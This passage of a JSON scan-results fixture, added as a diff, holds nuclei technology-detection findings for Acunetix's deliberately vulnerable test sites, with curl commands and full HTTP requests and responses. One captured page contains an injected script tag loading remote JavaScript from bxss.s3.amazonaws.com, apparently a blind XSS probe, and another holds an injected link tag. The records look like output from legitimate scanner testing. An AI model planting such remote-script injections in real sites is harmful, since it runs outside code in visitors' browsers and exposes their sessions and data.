close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 77, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:34:41.289Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 78, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "ms-iis", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:34:41.370Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 79, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angular", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:41.447Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 80, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angular", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:41.530Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 81, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "dreamweaver", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:41.599Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 82, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:41.669Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 83, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "ms-iis", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:34:41.734Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 